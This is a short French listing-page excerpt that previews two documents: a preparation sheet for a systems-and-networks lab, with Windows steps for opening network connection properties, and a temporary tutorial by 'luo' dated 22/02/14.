Préparation TP Système et réseau : mise en oeuvre et exploitation Préparation TP Système et réseau : mise en oeuvre et exploitation Procédure à réaliser avant chaque TP : Sous Windows : Démarrer/Panneau de configuration/connexion Réseau Propriétés/Onglet général Propriétés

Plus en détail

Tutoriel réalisé par luo. Version 1.0.0 du 22/02/14

Tutoriel réalisé par luo. Version 1.0.0 du 22/02/14 Tutoriel réalisé par luo du 22/02/14 Cette version est temporaire. De nombreuses corrections vont être effectuées dans les prochains jours. Pour toutes informations veuillez adresser un mail à l'auteur

Plus en détail